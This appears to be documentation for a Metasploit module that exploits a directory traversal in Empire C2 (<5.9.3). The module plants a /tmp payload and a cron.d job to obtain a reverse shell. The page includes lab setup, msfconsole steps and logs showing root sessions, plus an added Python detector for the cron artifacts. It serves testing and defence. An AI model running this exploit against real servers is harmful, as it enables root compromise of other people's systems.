## Vulnerable Application

This module exploits a directory traversal vulnerability in Empire C2 Framework (<5.9.3): it writes the payload into the `/tmp/` directory and then drops a `cron.d` file that executes the payload.

The vulnerability affects:

* Empire C2 Framework (<5.9.3)

This module was successfully tested on:

* Empire C2 Framework (v5.9.2) on Kali Linux 6.6.15
* Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15
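The two facts a defender can act on here are the affected version range (<5.9.3) and the artifact pair the module leaves on the host (a payload in `/tmp/` and a job file in `/etc/cron.d/`). The following Python is an added example for the defending side; it is not part of the Metasploit module or of Empire. It assumes cron.d files follow the standard `fields user command` layout, and the cron.d contents it scans are constructed samples (the random file names are copied from the scenario log below, not from a real host).

```python
"""Defender-side checks for the Empire (<5.9.3) traversal-to-cron chain described above.
Added example; it is not part of the Metasploit module or of Empire itself.

Two checks:
  1. is_vulnerable_version(): is an Empire version string inside the affected
     range (< 5.9.3) stated on this page?
  2. suspicious_cron_entries(): scan cron.d-style file contents for jobs whose
     command runs something out of a world-writable scratch directory, which is
     the artifact pair this chain leaves behind (payload in /tmp, job in /etc/cron.d).
The cron.d contents below are constructed samples, not real files.
"""
import re
from typing import Dict, List, Tuple

FIXED_VERSION = (5, 9, 3)  # first fixed release named on the page


def parse_version(text: str) -> Tuple[int, int, int]:
    """Turn 'v5.9.2' or 'Empire 5.9.2' into a comparable tuple (5, 9, 2)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version found in {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_vulnerable_version(text: str) -> bool:
    """True when the version is below 5.9.3 (tuple comparison, so 5.10.0 counts as fixed)."""
    return parse_version(text) < FIXED_VERSION


# /etc/cron.d syntax: five time fields (or @reboot etc.), then the user, then the command.
CRON_JOB = re.compile(r"^\s*(?:@\w+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def suspicious_cron_entries(files: Dict[str, str]) -> List[Dict[str, object]]:
    """Return one finding per cron.d job whose command references a scratch directory."""
    findings = []
    for path, content in files.items():
        for lineno, line in enumerate(content.splitlines(), 1):
            stripped = line.strip()
            if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
                continue  # blank line, comment, or VAR=value assignment
            m = CRON_JOB.match(line)
            if not m:
                continue
            cmd = m.group("cmd")
            if any(d in cmd for d in SCRATCH_DIRS):
                findings.append({"file": path, "line": lineno,
                                 "user": m.group("user"), "command": cmd})
    return findings


# Constructed sample: two ordinary jobs plus one shaped like the module's artifact
# (file name and /tmp path taken from the scenario log on this page, not a real host).
SAMPLE_CRON_D = {
    "/etc/cron.d/e2scrub_all": "30 3 * * 0 root test -e /run/systemd/system || /usr/sbin/e2scrub_all\n",
    "/etc/cron.d/backup": "SHELL=/bin/sh\n# nightly backup\n0 2 * * * backup /usr/local/bin/backup.sh\n",
    "/etc/cron.d/AeVTTPiZ": "* * * * * root /tmp/NYLkIKRK\n",
}

if __name__ == "__main__":
    for v in ("v5.9.2", "v5.9.3", "5.10.0"):
        print(f"{v}: {'affected' if is_vulnerable_version(v) else 'not affected'}")
    for f in suspicious_cron_entries(SAMPLE_CRON_D):
        print(f"{f['file']}:{f['line']} user={f['user']} cmd={f['command']!r}")
```

On a live host, feed `suspicious_cron_entries` the contents of every file under `/etc/cron.d/` and treat a root job whose command lives in `/tmp/` as a high-confidence indicator; the module deletes its own files once the session is up, so a periodic snapshot (or file-integrity monitoring on `/etc/cron.d/`) is what makes the one-minute window observable.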
## Install and run the vulnerable Empire

- Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
- Install Kali Linux (or another Linux distro) in your virtualization engine.
- Pull the pre-built Empire Docker container (<5.9.3) in your VM:
  ```
  docker pull bcsecurity/empire:v5.9.2
  ```
- Run the server and the client on the same VM.
- Run the server:
  ```
  docker run -it --net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d bcsecurity/empire:v5.9.2
  ```
  (`--net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d` is not a realistic deployment; it is used here only to keep the setup simple.)
- Run the client:
  ```
  docker run -it --net="host" bcsecurity/empire:v5.9.2 client
  ```
- Start an Empire listener from the client:
  ```
  uselistener http
  set Host <rhost>
  set Port <port>
  execute
  ```
## Verification Steps

- Install the application
- Start `msfconsole`
- Do: `use exploit/linux/http/empire_skywalker`
- Do: `set rhost <rhost>`
- Do: `set rport <port>`
- Do: `set lhost <attacker-ip>`
- Do: `run`
- Have the generated request processed by a vulnerable version of Empire
- You should get a shell or meterpreter
## Options

### STAGE_PATH (required)

Empire's default staging path. Default is `login/process.php`.

### PROFILE (required)

The default communication profile of the Empire agent. Default is `Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko`.
## Scenarios

### Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 0, port 80)

```
msf6 > use exploit/linux/http/empire_skywalker
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.7
rhost => 192.168.56.7
msf6 exploit(linux/http/empire_skywalker) > set rport 80
rport => 80
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.7:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/NYLkIKRK
[*] Writing cron job to /etc/cron.d/AeVTTPiZ
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (24772 bytes) to 192.168.56.7
[+] Deleted /etc/cron.d/AeVTTPiZ
[+] Deleted /tmp/NYLkIKRK
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:48026) at 2024-07-20 11:32:03 +0900
[!] This exploit may require manual cleanup of '/var/lib/powershell-empire/empire/server/downloads/LML47FWS/agent.log' on the target
meterpreter > sysinfo
Computer        : kali
OS              : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
```
### Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)

```
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set target 1
target => 1
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/jJzYkeKV
[*] Writing cron job to /etc/cron.d/nFnFIbim
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (36 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/nFnFIbim
[+] Deleted /tmp/jJzYkeKV
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/WV9TEJTE/agent.log, unknown result
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:42068) at 2024-07-20 14:40:09 +0900

whoami
root
```
### Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)

```
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set target 2
target => 2
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/qxlOSIYF
[*] Writing cron job to /etc/cron.d/ugrYIJzf
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/ugrYIJzf
[+] Deleted /tmp/qxlOSIYF
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/JJR8EMKK/agent.log, unknown result
[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:46040) at 2024-07-20 14:44:09 +0900

whoami
root
```